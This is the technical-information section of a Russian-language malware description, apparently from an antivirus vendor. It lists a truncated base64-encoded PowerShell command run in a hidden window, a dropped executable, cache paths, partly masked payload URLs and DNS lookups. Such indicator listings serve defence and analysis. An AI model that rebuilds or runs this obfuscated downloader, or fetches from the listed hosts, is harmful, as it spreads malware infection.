Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAFIAVABRAFYAZgBuAGQAPQAnAEEAQwBBAEsARAB6AG8AdAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABDAFUAYABSAGAAaQB0AFkAYABQAFIAbwB0AG8AQwBgAE8AbAAiAC...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\162.exe
- %HOMEPATH%\162.exe
- http://in###webr.com/morgans/dQ/
- http://mi#####5.a2hosting.com/suspended.page/
- http://pl#####industries.net/signaturepics.73CA/fr238/
- http://www.bo###ereis.net/wp-includes/uY/
- DNS ASK es###tors.com
- DNS ASK im###pros.com
- DNS ASK in###webr.com
- DNS ASK mi#####5.a2hosting.com
- DNS ASK pl#####industries.net
- DNS ASK bo###ereis.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAFIAVABRAFYAZgBuAGQAPQAnAEEAQwBBAEsARAB6AG8AdAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYABDAFUAYABSAGAAaQB0AFkAYABQAFIAbwB0AG8AQwBgAE8AbAAiAC...' (со скрытым окном)